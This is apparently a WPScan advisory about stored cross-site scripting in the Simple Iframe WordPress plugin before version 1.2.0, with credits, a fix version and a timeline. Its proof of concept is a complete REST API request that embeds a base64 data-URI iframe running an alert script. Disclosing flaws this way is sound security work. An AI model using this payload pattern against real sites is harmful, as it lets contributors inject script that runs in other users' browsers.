WordPress Plugin Vulnerabilities
Simple Iframe < 1.2.0 - Contributor+ Stored XSS
Description
The plugin does not properly validate one of its WordPress block attribute's content, which may allow users whose role is at least that of a contributor to conduct Stored Cross-Site Scripting attacks.
Proof of Concept
POST /wp-json/wp/v2/posts/60?_locale=user HTTP/1.1
Host: 127.0.0.1
Content-Length: 378
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Content-Type: application/json
Accept: application/json, */*;q=0.1
X-WP-Nonce: 653192f849
X-HTTP-Method-Override: PUT
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/wp-admin/post-new.php
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: [Contributor+]
Connection: close
{"id":60,"title":"XSS TEST","content":"<!-- wp:unapersona/simple-iframe {\"iframeSrc\":\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=\"} -->\n<iframe style=\"width:100%;max-width:100%;height:320px\" src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=\" class=\"\" frameborder=\"0\"></iframe>\n<!-- /wp:unapersona/simple-iframe -->","status":"publish"}
Affects Plugins
Fixed in 1.2.0 References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Jihoon Lee (AhnLab)
Submitter
Jihoon Lee (AhnLab)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-06-19 (about 5 months ago)
Added
2023-06-19 (about 5 months ago)
Last Updated
2023-07-14 (about 4 months ago)
WPScan 